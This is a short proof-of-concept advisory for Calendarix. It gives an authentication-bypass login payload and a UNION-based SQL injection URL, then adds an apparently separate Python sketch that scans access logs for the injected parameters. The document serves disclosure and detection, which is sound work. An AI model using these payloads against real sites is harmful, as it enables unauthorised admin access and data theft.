PoC/Exploit for SQL Injection and Authentication Bypass in Calendarix

Published Proof of Concept code - SQL Injection and Authentication Bypass in Calendarix.

Description: Available
Solution: Not available - check vendor's website

1. Authentication Bypass

Link: http://host/calendarix/admin/cal_login.php

username: ' or 1/*

password: any

2. SQL-Injection Example

http://host/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99%20union%20select%2012345
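
Detection sketch for the cal_day.php case above. This is an added example, not part of the original advisory or of Calendarix. It assumes Common Log Format access logs and that catview is a numeric category id and date is YYYY-MM-DD, as the example URL suggests; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist: catview is a numeric category id, date is YYYY-MM-DD
# (inferred from the advisory's example URL, not from Calendarix source).
EXPECTED = {
    "catview": re.compile(r"[0-9]{1,10}"),
    "date": re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}"),
}
# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return {param: decoded value} for cal_day.php parameters failing the allowlist."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cal_day.php"):
        return {}
    bad = {}
    # parse_qs percent-decodes, so %20union%20select is matched as plain text.
    for name, values in parse_qs(parts.query).items():
        for value in values:
            if name in EXPECTED and not EXPECTED[name].fullmatch(value):
                bad[name] = value
    return bad


def scan(log_lines):
    """Return [(line_number, findings)] for log lines with a failing parameter."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        findings = suspicious_params(match.group(1)) if match else {}
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2006:10:00:00 +0000] "GET /calendarix/cal_day.php'
    '?op=day&date=2006-01-10&catview=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Jan/2006:10:00:05 +0000] "GET /calendarix/cal_day.php'
    '?op=day&date=2006-01-10&catview=99%20union%20select%2012345 HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same allowlist can be enforced in front of the application (reverse proxy or WAF rule) while no vendor fix is available.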
